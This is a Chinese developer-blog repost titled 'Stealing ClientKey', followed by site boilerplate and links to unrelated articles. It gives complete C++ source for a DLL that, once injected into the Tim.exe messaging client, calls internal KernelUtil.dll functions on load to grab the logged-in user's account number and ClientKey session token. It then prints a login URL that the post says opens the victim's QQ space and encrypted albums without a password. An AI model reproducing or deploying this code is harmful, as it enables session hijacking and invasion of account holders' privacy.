1. 全栈程序员必看首页

窃取ClientKey

全栈程序员-站长 未分类 阅读 3

窃取ClientKey编译好 DLL 直接注入 Tim exe 使用 dbgView 等工具查看输出的 url 复制到任何一台电脑 使用浏览器打开这个 url 就可以不需要密码进入某人的空间 查看加密相册等 DLL 源码 dllmain cpp 定义 DLL 应用程序的入口点 include pch h include stdio h include WTypes h WTypes h stdio h

编译好DLL,直接注入Tim.exe,使用dbgView等工具查看输出的url,复制到任何一台电脑,使用浏览器打开这个url,就可以不需要密码进入某人的空间,查看加密相册等~

DLL源码:

// dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "pch.h" #include  
     #include  
     //定义CTXStringW为BSTR typedef BSTR CTXStringW; CTXStringW AllocTXString(const wchar_t* lpSrc) { 
    if (lpSrc == NULL) return NULL; BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2]; if (bBuffer == NULL) return NULL; DWORD dwZero = 0; DWORD dwCount = 3; DWORD dwLenth = wcslen(lpSrc) + 1; memmove(bBuffer + 0 * 4, &dwZero, 4); memmove(bBuffer + 1 * 4, &dwCount, 4); memmove(bBuffer + 2 * 4, &dwLenth, 4); memmove(bBuffer + 3 * 4, &dwLenth, 4); wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc); return CTXStringW(bBuffer + 16); } VOID Steal() { 
    do { 
    HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll"); if (hKernelUtil == NULL) { 
    OutputDebugStringA("Get KernelUtil Module failed \n"); break; } PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ"); if (PtrGetSelfUin == NULL) { 
    OutputDebugStringA("Get GetSelfUin Function failed \n"); break; } DWORD uin = ((int(*)(int))PtrGetSelfUin)(1); if (uin == NULL) { 
    OutputDebugStringA("Invoke GetSelfUin Function failed \n"); break; } // Print  number char szUin[MAX_PATH] = { 
    0 }; sprintf(szUin, "%d", uin); PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z"); if (GetSignature == NULL) { 
    OutputDebugStringA("Get GetSignature Function failed \n"); break; } WCHAR wsBuffer[MAX_PATH] = { 
    0 }; CTXStringW ClientKey = AllocTXString(wsBuffer); PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature"); if (res == NULL) { 
    OutputDebugStringA("Invoke GetSignature Function failed \n"); break; } // 复制下面链接,无需密码,进入空间 char msg[MAX_PATH] = { 
    0 }; sprintf(msg, "https://ssl.ptlogin2..com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone..com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin); OutputDebugStringA(msg); } while (0); } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { 
    switch (ul_reason_for_call) { 
    case DLL_PROCESS_ATTACH: Steal(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/204909.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2026年3月19日 下午7:15
下一篇 2026年3月19日 下午7:16


相关推荐

  • VIM中的保存和退出,VIM退出命令,如何退出vim编辑,VIM命令

    VIM中的保存和退出,VIM退出命令,如何退出vim编辑,VIM命令

    VIM中的保存和退出,VIM退出命令,如何退出vim编辑,VIM命令在Linux中使用vim时,输入vimxxx.file输入好文件内容之后,怎么保存呢?按ESC,左下角就可以进行输入:w保存但不退出:wq保存并退出:q退出:q!强制退出,不保存:e!放弃所有修改,从上次保存文件开始再编辑命令历史…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月27日
    46
  • laravel 博客项目部署到Linux系统后报错 权限都设置为777,仍然报错没有权限

    laravel 博客项目部署到Linux系统后报错 权限都设置为777,仍然报错没有权限

    laravel 博客项目部署到Linux系统后报错 权限都设置为777,仍然报错没有权限

    全栈程序员-站长的头像 全栈程序员-站长
    2021年10月27日
    61
  • 外网访问内网的FTP服务器

    外网访问内网的FTP服务器

    外网访问内网的FTP服务器1 背景简介最近研究如何在内网搭架 FTP 服务器 同时要保证外网 公网 能访问的到 终成正果 但走了一些弯路 在此记下 以飨后人 2 基础知识 FTP 使用 2 个端口 一个数据端口和一个命令端口 也叫做控制端口 这两个端口一般是 21 命令端口 和 20 数据端口 当然你也可以自定义 控制 Socket 用来传送命令 数据 Socket 是用于传送数据 每一个 FTP 命令发送之后

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月18日
    2
  • MySQL字符串分割_c语言中如何截取字符串

    MySQL字符串分割_c语言中如何截取字符串

    MySQL字符串分割_c语言中如何截取字符串有分隔符的字符串拆分题目要求数据库中num字段值为:实现的效果:需要将一行数据变成多行实现的SQLSELECTSUBSTRING_INDEX(SUBSTRING_INDEX(‘7654,7698,7782,7788′,’,’,help_topic_id+1),’,’,-1)ASnumFROMmysql.help_topic…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月7日
    6
  • 《Linux内核修炼之道》 之 高效学习Linux内核

    《Linux内核修炼之道》 之 高效学习Linux内核

    《Linux内核修炼之道》 之 高效学习Linux内核世界悲结束了,章鱼哥也退役了,连非诚勿扰中的拜金女也突然的少了很多。这本《Linux内核修炼之道》在卓越、当当、china-pub上也已经开卖了,虽然是严肃文学,但为了保证流畅性,大部分文字我还都是斟词灼句,反复的念几遍才写上去的,尽量考虑到写上去的每段话能够让读者产生什么疑惑,然后也都会紧接着尽量的去进行解释清楚,中间的很多概念也有反复纠结过怎么解释能够更容易的理解,力求即使对于初学者也可以有很…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月23日
    12
  • Git 当前项目设置 用户名、邮箱「建议收藏」

    Git 当前项目设置 用户名、邮箱「建议收藏」

    Git 当前项目设置 用户名、邮箱「建议收藏」Git全局配置和单个仓库的用户名邮箱配置学习git的时候,大家刚开始使用之前都配置了一个全局的用户名和邮箱$gitconfig–globaluser.name“github’sName”$gitconfig–globaluser.email“github@xx.com”$gitconfig–list如果你公司的项目是放在自建的gitlab上面,如…

    全栈程序员-站长的头像 全栈程序员-站长
    2025年9月29日
    3

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号